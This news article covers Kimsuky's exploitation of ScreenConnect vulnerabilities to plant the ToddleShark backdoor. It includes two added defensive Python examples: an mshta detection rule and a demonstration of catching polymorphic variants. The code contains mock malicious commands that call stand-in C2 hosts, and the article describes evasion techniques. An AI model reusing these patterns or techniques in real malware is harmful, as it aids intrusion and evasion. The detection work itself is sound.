North Korea targets ScreenConnect bugs to drop ‘ToddleShark’ malware

North Korean hackers are exploiting a critical vulnerability in ConnectWise’s ScreenConnect software to spread new, morphing spy malware.

Two weeks ago, ConnectWise disclosed two flaws in its popular remote desktop application: CVE-2024-1708, a path traversal bug rated “high” at 8.4 out of 10 on the CVSS scale, and CVE-2024-1709, a rare “critical” authentication bypass scored a maximum 10 out of 10. Attackers wasted no time in exploiting them, notably initial access brokers (IABs) working in cahoots with ransomware gangs, leaving thousands of organizations in the line of fire as they hurried to patch.

Kimsuky (also known as APT43), the Democratic People’s Republic of Korea (DPRK) advanced persistent threat (APT), has also gotten in on the action. According to a new blog post from Kroll, it is exploiting vulnerable versions of ScreenConnect to deploy a new backdoor called “ToddleShark”.

“The list of threat actors using the CVE-2024-1709 ScreenConnect vulnerability for initial access is growing,” according to Kroll. “It is therefore imperative to patch ScreenConnect applications.”

ToddleShark is based on the previous Kimsuky malware but stands out with its anti-detection approach.

North Korea exploits ScreenConnect

In recent espionage campaigns, Kimsuky has used various custom backdoors, including ReconShark and BabyShark, against government organizations, research centers, think tanks and universities in North America, Europe and Asia.

ToddleShark, the weapon of choice this time, is remarkably similar to BabyShark, but features some important advancements.

Among other functions, ToddleShark collects system information, including configuration details, what security software is installed on the device, and lists of user sessions, network connections, running processes, and more.

It then sends that information to attacker-controlled command-and-control (C2) servers, encoded in cryptographically protected Privacy-Enhanced Mail (PEM) certificates.

“The malware deployed in this case uses execution via a legitimate Microsoft binary, MSHTA, and exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing code location via generated junk code, and using uniquely generated C2 URLs, which may make this malware difficult to detect in some environments,” Kroll researchers said in their post, published today.
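The MSHTA execution Kroll mentions lends itself to a behavioural check that does not depend on file hashes. The following is an added example, not Kroll’s or ConnectWise’s code: it runs a simple rule over constructed process-creation events (Sysmon Event ID 1 field names, invented values) and flags mshta.exe launches whose argument is a URL or inline script rather than a local .hta file, or whose parent process is outside an expected set. The EXPECTED_PARENTS allowlist is an assumption for this example and would be tuned per environment.

```python
"""Added example (not Kroll's or ConnectWise's code): a behavioural check for
mshta.exe launches, run over constructed Sysmon-style process-creation events."""
import re

# Constructed events. Field names follow Sysmon Event ID 1; every value is invented.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Users\alice\Documents\notes.hta',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://stage.example.invalid/k9f2q',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\mshta.exe" vbscript:Execute("x")',
     "ParentImage": r"C:\Program Files (x86)\SomeVendor\RemoteTool.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# A remote URL or an inline script handler means mshta is not rendering a local file.
REMOTE_OR_INLINE = re.compile(r"(https?://|\bjavascript:|\bvbscript:|\babout:)", re.I)

# Assumption for this example: the only parent that normally launches mshta here is the
# shell. Real deployments would build this list from their own baseline.
EXPECTED_PARENTS = {"explorer.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def mshta_findings(event: dict) -> list:
    """Return the reasons an event is suspicious; empty list if benign or not mshta."""
    if basename(event.get("Image", "")) != "mshta.exe":
        return []
    reasons = []
    if REMOTE_OR_INLINE.search(event.get("CommandLine", "")):
        reasons.append("argument is a URL or inline script rather than a local .hta file")
    parent = basename(event.get("ParentImage", ""))
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"unexpected parent process {parent}")
    return reasons


def scan(events: list) -> list:
    """Return (event index, reasons) for every event that triggers the rule."""
    hits = []
    for index, event in enumerate(events):
        reasons = mshta_findings(event)
        if reasons:
            hits.append((index, reasons))
    return hits


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):  # prints hits for events 1 and 2
        print(index, SAMPLE_EVENTS[index]["CommandLine"])
        for reason in reasons:
            print("   -", reason)
```

The rule keys on what the binary is being asked to do and who started it, which is exactly what survives when the payload’s hash, strings and URLs change between victims.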

How ToddleShark uses randomness to evade detection

ToddleShark is most notable for the way it uses random generation algorithms to evade detection. For example, it uses random names for variables and functions to thwart static detection, and randomizes its strings and code ordering to confuse standard signature-based detection.

Interspersed among the actual malicious code are large chunks of junk code and hex-encoded code, making the end result hard to follow.

Blocklisting doesn’t work against ToddleShark either, because the hash of the initial payload and the URLs used to download additional stages of the malware are different every time.
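The two preceding paragraphs (randomised identifiers and strings, junk code, hex-encoded code, ever-changing hashes) describe why an exact-hash blocklist fails; what a defender can do instead is match on what the attacker cannot randomise away. The following is an added example, not Kroll’s or ConnectWise’s code, and all of its inputs are constructed: two variants of a VBScript-like script that differ only in identifier names, comments, how the hex blob is split and junk assignments, plus a benign control. It shows the raw hashes differing, a canonical form (comments and literal contents stripped, dead junk variables dropped, identifiers alpha-renamed) hashing identically for both variants, and a structural feature, the total length of long hex runs, that also matches both. The canonicalisation rules, the hex blob and the function names are this example’s own.

```python
"""Added example, not Kroll's or ConnectWise's code: why a hash blocklist misses
polymorphic variants and how canonicalisation plus a structural feature still match.
Both script variants, the hex blob and the benign control are constructed."""
import hashlib
import re

# Constructed hex blob standing in for the "hex encoded code" the article mentions.
# It is a deterministic, meaningless byte pattern, not real malware: 96 bytes, 192 chars.
BLOB = "".join(f"{(i * 37 + 11) % 256:02x}" for i in range(96))

# Two constructed variants of one script: names, comments, string splitting and junk
# assignments differ; the live logic (build the blob, hand it to Stage) is identical.
VARIANT_A = f"""
Dim qzvkrtwplm
qzvkrtwplm = "{BLOB[:64]}" & "{BLOB[64:]}"
' junk comment 17
Dim hkdfbwqzrt
hkdfbwqzrt = 4127 + 33
Call Stage(qzvkrtwplm, "http://c2-a1b2c3.invalid/x")
"""
VARIANT_B = f"""
Dim mvrtpxnzqk
' qhzvtn
Dim wlsbpkjrmf
wlsbpkjrmf = 90 * 2
mvrtpxnzqk = "{BLOB[:32]}" & "{BLOB[32:]}"
Call Stage(mvrtpxnzqk, "http://c2-z9y8x7.invalid/y")
"""
BENIGN = """
Dim greeting
greeting = "Hello, " & "world"
Call Display(greeting)
"""

KEYWORDS = {"dim", "call", "set", "sub", "end", "function", "if", "then", "else"}
IDENT = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
STRING = re.compile(r'"[^"]*"')
NUMBER = re.compile(r"\b\d+\b")
COMMENT = re.compile(r"'.*")
TARGET = re.compile(r"(?:Dim\s+)?([A-Za-z_]\w*)\s*(?:=|$)", re.IGNORECASE)
HEX_RUN = re.compile(r"[0-9a-fA-F]{32,}")


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def blocklist_hit(script: str, blocklist: set) -> bool:
    """The naive approach: exact hash of the script as seen on disk."""
    return sha256_hex(script) in blocklist


def target_of(line: str):
    """Name a line declares (Dim x) or assigns (x = ...), else None."""
    m = TARGET.match(line)
    return m.group(1) if m else None


def canonical_form(script: str) -> str:
    """Strip what the attacker randomises: comments, literal contents, dead (junk)
    variables and identifier names. What remains is the live structure."""
    lines = []
    for raw in script.splitlines():
        line = COMMENT.sub("", raw).strip()
        if line:
            lines.append(NUMBER.sub("#", STRING.sub('""', line)))
    # Dead-store removal: a variable that only ever appears as a Dim/assignment
    # target is never read, so every line mentioning it is junk.
    refs, targets = {}, {}
    for line in lines:
        for name in IDENT.findall(line):
            if name.lower() not in KEYWORDS:
                refs[name] = refs.get(name, 0) + 1
        tgt = target_of(line)
        if tgt:
            targets[tgt] = targets.get(tgt, 0) + 1
    dead = {name for name, count in targets.items() if refs.get(name, 0) == count}
    kept = [ln for ln in lines if target_of(ln) not in dead]
    # Alpha-rename the surviving identifiers in order of first appearance.
    names = {}

    def rename(m):
        name = m.group(0)
        if name.lower() in KEYWORDS:
            return name
        return names.setdefault(name, f"v{len(names)}")

    return "\n".join(IDENT.sub(rename, ln) for ln in kept)


def canonical_hash(script: str) -> str:
    return sha256_hex(canonical_form(script))


def hex_literal_chars(script: str) -> int:
    """Structural feature that survives renaming, re-splitting and junk insertion:
    the script still has to carry its hex-encoded payload."""
    return sum(len(run) for run in HEX_RUN.findall(script))


if __name__ == "__main__":
    seen = {sha256_hex(VARIANT_A)}  # blocklist built from the first sample
    print("blocklist catches B:", blocklist_hit(VARIANT_B, seen))  # False
    print("canonical hashes equal:", canonical_hash(VARIANT_A) == canonical_hash(VARIANT_B))  # True
    print("hex chars A/B/benign:", hex_literal_chars(VARIANT_A),
          hex_literal_chars(VARIANT_B), hex_literal_chars(BENIGN))  # 192 192 0
```

Dead-store removal is the step that neutralises the junk code here: the junk variables are assigned but never read, so dropping them leaves the same skeleton in both variants. Junk that is actually consumed by live code would survive canonicalisation, which is why the structural feature is kept alongside it rather than relying on either alone.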

The difficulty of detecting this backdoor only emphasizes the need for organizations to upgrade, if they haven’t already. A patch and other resources are available to ConnectWise customers on the vendor’s website.

A ConnectWise spokesperson outlined the timeline:

“On February 13, an independent researcher reported a potential ScreenConnect vulnerability through our voluntary disclosure process,” the spokesperson says. “Once validated, ConnectWise mitigated all ScreenConnect cloud instances within 48 hours. On February 19, we released a patch to all on-premises ScreenConnect customers, posted a security bulletin in the ConnectWise Trust Center, and sent instructions for applying the patch to ScreenConnect customers.”

ConnectWise noted that customers should apply patches to their on-premises ScreenConnect instances immediately.

“At this time, ConnectWise and other cybersecurity firms have found exploits of the ScreenConnect vulnerability on unpatched on-premise instances,” the spokesperson says. “However, cyber attacks can occur through numerous avenues, including vulnerabilities, phishing, and business email compromise. While typically used for IT service delivery and product support, attackers can misuse remote control tools to facilitate malicious activity.”
